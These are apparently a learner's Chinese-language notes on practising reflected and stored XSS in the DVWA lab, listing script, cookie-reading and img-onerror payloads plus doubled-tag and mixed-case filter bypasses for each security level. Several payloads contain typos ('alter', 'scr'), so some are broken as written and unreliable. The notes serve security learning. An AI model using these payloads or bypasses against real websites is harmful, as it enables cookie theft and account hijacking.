xss学习笔记
xss(跨站脚本攻击)注入分为两种:
反射型(Reflected):url取参时进行非法调
用。
存储型(Stored):将非法内容保存到数据库中,
然后系统从数据库中获取的非法内容进行调
用.
dvwa上有已经搭好的xss反射型和存储型注入平台.
反射型(Reflected):
low:<script>alter(/xss/)</script>
<script>document.write(document.cookie)</script>
<script>alert(document.cookie)</script>
medium:
双写: <sc<script>ript>alter(/xss/)</script>
大小写绕过; <ScRipt>alter(/xss/)</script>
high:
无法使用
<img src=1 onerror=alter(/xxs/)>
impossible:
存储型(Stored):
存储型相对于反射型来说更为复杂一点,较为高级的注入,就另辟蹊径,从name懒进行注入,但name栏有字数限制.于是用burp suite抓包修改。
这里遇到一个问题,发现我的burp suite居然抓不了dvwa的包,得到代理服务器那儿将不代理服务器里面的内容清空。
low:
<script>alter(/xss/)</script>
medium:
也是双写绕过: <sc<script>ript>alter(/name/)</script>
(这里直接抓包在name栏里注入)
大小写绕过:<ScRipt>alter(/name)</script>
high:
<img scr=1 alter(/name/)>
impossible:
详情:https://www.freebuf.com/articles/web/123779.html
进阶:https://blog.csdn.net/God_XiangYu/article/details/97616579